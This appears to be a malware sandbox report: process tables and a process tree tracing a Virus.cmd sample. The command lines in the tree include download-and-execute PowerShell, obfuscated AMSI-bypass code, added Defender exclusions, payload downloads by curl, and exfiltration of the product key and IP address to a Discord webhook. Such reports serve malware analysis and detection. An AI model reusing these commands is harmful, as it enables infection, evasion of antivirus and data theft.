PID 4128 wrote to memory of 1812 | 4128 | cmd.exe | find.exe
PID 4128 wrote to memory of 1812 | 4128 | cmd.exe | find.exe
PID 2900 wrote to memory of 5112 | 2900 | cmd.exe | cmd.exe
PID 2900 wrote to memory of 5112 | 2900 | cmd.exe | cmd.exe
PID 5112 wrote to memory of 2556 | 5112 | cmd.exe | reg.exe
PID 5112 wrote to memory of 2556 | 5112 | cmd.exe | reg.exe
PID 5112 wrote to memory of 3048 | 5112 | cmd.exe | findstr.exe
PID 5112 wrote to memory of 3048 | 5112 | cmd.exe | findstr.exe
PID 2900 wrote to memory of 2112 | 2900 | cmd.exe | cmd.exe
PID 2900 wrote to memory of 2112 | 2900 | cmd.exe | cmd.exe
PID 2112 wrote to memory of 804 | 2112 | cmd.exe | curl.exe
PID 2112 wrote to memory of 804 | 2112 | cmd.exe | curl.exe
PID 2900 wrote to memory of 1020 | 2900 | cmd.exe | cmd.exe
PID 2900 wrote to memory of 1020 | 2900 | cmd.exe | cmd.exe
PID 1020 wrote to memory of 3388 | 1020 | cmd.exe | curl.exe
PID 1020 wrote to memory of 3388 | 1020 | cmd.exe | curl.exe
PID 2900 wrote to memory of 4216 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 4216 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 400 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 400 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 2196 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 2196 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 3000 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 3000 | 2900 | cmd.exe | curl.exe
PID 2900 wrote to memory of 2076 | 2900 | cmd.exe | DriverLocator.exe
PID 2900 wrote to memory of 2076 | 2900 | cmd.exe | DriverLocator.exe
PID 2900 wrote to memory of 2076 | 2900 | cmd.exe | DriverLocator.exe
PID 2900 wrote to memory of 2560 | 2900 | cmd.exe | timeout.exe
PID 2900 wrote to memory of 2560 | 2900 | cmd.exe | timeout.exe
PID 2076 wrote to memory of 4752 | 2076 | DriverLocator.exe | SMAtMZpm.exe
PID 2076 wrote to memory of 4752 | 2076 | DriverLocator.exe | SMAtMZpm.exe
PID 2900 wrote to memory of 4480 | 2900 | cmd.exe | Drivermapper.exe
PID 2900 wrote to memory of 4480 | 2900 | cmd.exe | Drivermapper.exe
PID 2900 wrote to memory of 4668 | 2900 | cmd.exe | timeout.exe
PID 2900 wrote to memory of 4668 | 2900 | cmd.exe | timeout.exe
PID 4480 wrote to memory of 4420 | 4480 | Drivermapper.exe | powershell.exe
PID 4480 wrote to memory of 4420 | 4480 | Drivermapper.exe | powershell.exe
PID 4480 wrote to memory of 1540 | 4480 | Drivermapper.exe | x4V5.2.exe
PID 4480 wrote to memory of 1540 | 4480 | Drivermapper.exe | x4V5.2.exe
PID 4480 wrote to memory of 408 | 4480 | Drivermapper.exe | powershell.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
pid | process
3112 | attrib.exe
4376 | attrib.exe
1832 | attrib.exe
Processes
path | command line | PID (child processes indented under their parent)
C:\Windows\system32\winlogon.exe | winlogon.exe | PID:640
  C:\Windows\system32\dwm.exe | "dwm.exe" | PID:472
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{a0b03bef-0f70-49e4-93e4-31bbeeeee3d6} | PID:1100
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{2a93eae8-0868-45cf-842e-7636e08ae158} | PID:2080
C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID:696
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID:996
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID:540
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID:464
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID:1032
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID:1120
  - Drops file in System32 directory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xjeLFlXJvxoT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BgqrkrvyFKyuUC,[Parameter(Position=1)][Type]$mHOHrtAtbI)$tyEVppdzzpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$tyEVppdzzpa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',M'+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$tyEVppdzzpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'b'+[Cha
r](108)+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+'d'+'eB'+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$mHOHrtAtbI,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $tyEVppdzzpa.CreateType();}$XvNsKxOuZSUXC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dll')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+'f'+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+'s'+'a'+[Char](102)+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+'s');$ZmpTZzwfgWUUhb=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'oc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OnYMlqRfuVuNKBPJRLT=xjeLFlXJvxoT @([String])([IntPtr]);$hGxWaomfUCSBCKIuthHHip=xjeLFlXJvxoT 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SvHQLalbNuG=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FMPRuWkRraqNqN=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$PtaUzRiaDWdDVxtcq=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$znjogQI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FMPRuWkRraqNqN,$OnYMlqRfuVuNKBPJRLT).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kJOkllUHVpOiOiyoM=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$znjogQI,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$knRNvBfrBw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,4,[ref]$knRNvBfrBw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kJOkllUHVpOiOiyoM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,0x20,[ref]$knRNvBfrBw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('x'+'4'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+'
'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4656
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DEoEBGJjiChX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uOoTGwaAgywXvz,[Parameter(Position=1)][Type]$AGuOKAYXqA)$RmXwndVcdnP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'te'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+''+','+''+'A'+'uto'+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$RmXwndVcdnP.DefineConstructor('RT'+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uOoTGwaAgywXvz).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+'d');$RmXwndVcdnP.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+'ig'+','+''+[Char](78)+'e'+'w
'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'l',$AGuOKAYXqA,$uOoTGwaAgywXvz).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'ge'+[Char](100)+'');Write-Output $RmXwndVcdnP.CreateType();}$XGNzFszxOfdtL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'hod'+[Char](115)+'');$uqvipmuGFvoYqY=$XGNzFszxOfdtL.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eHuKsvmAVPIIiRnVQsw=DEoEBGJjiChX @([String])([IntPtr]);$zVZKtbqIDcbtSGwsaNpBbj=DEoEBGJjiChX 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eaFLgIIWtvN=$XGNzFszxOfdtL.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+'l'+'l')));$wABVHMQrYEjHvh=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$COnTZLLtMOEuyAgOn=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$raCDuSL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wABVHMQrYEjHvh,$eHuKsvmAVPIIiRnVQsw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$JzmyhkInvwLCaepRW=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$raCDuSL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+'r')));$xSmRcpBvxE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,4,[ref]$xSmRcpBvxE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JzmyhkInvwLCaepRW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,0x20,[ref]$xSmRcpBvxE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:1616
-
-
C:\Users\Admin\x4MaliciousC:\Users\Admin\x4Malicious2⤵
- Executes dropped EXE
PID:544
-
-
C:\Users\Admin\x4MaliciousC:\Users\Admin\x4Malicious2⤵
- Executes dropped EXE
PID:1044
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1420
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2576
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2032
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2700
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2852
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3100
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.cmd"2⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm rentry.co/_setup/raw | iex3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Public\uninstaller.bat"4⤵PID:1444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\winlog32.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command ""5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol | find ":\"5⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\system32\mountvol.exemountvol6⤵PID:1224
-
-
C:\Windows\system32\find.exefind ":\"6⤵PID:3240
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath C:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath F:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath D:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid /value | find /i "uuid="5⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid /value6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\system32\find.exefind /i "uuid="6⤵PID:1812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault" | findstr /ri "REG_SZ"5⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\reg.exereg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault"6⤵PID:2556
-
-
C:\Windows\system32\findstr.exefindstr /ri "REG_SZ"6⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent icanhazip.com5⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\curl.execurl --silent icanhazip.com6⤵PID:804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -ks "https://rentry.co/cbkt9fio/raw"5⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\curl.execurl -ks "https://rentry.co/cbkt9fio/raw"6⤵PID:3388
-
-
-
C:\Windows\system32\curl.execurl -H "Content-Type: application/json" -d "{\"username\": \"TrollSec\", \"embeds\": [{\"title\": \"Enemey Down\", \"color\": 1, \"fields\": [{\"name\": \"Enemey Informations :\", \"value\": \" ```Admin/UJHKQCDS``` **Unique Identifier** `````` **Product Key** ```YC7N8-G7WR6-9WR4H-6Y2W4-KBT6X``` **IP Address** ```191.101.209.39``` \"}],\"thumbnail\":{\"url\": \"\"}, \"footer\":{\"text\": \"17:07:55.18/Fri 06/21/2024\"}}]}" https://discord.com/api/webhooks/1247862642509484092/vR90Kb-l3UPi2-9HRZ2fJ7o7Q0EBnbyiLGfvtKGN75kUdsj5C5BQ0HaTzj15zyWZuFsZ5⤵PID:4216
-
-
C:\Windows\system32\curl.exeCurl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/uninstaller" --output "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"5⤵
- Drops file in System32 directory
PID:400
-
-
C:\Windows\system32\curl.exeCurl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/winhlp32.ex" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"5⤵
- Drops file in System32 directory
PID:2196
-
-
C:\Windows\system32\curl.exeCurl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/x4joex.exe" --output "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"5⤵
- Drops file in System32 directory
PID:3000
-
-
C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"6⤵
- Executes dropped EXE
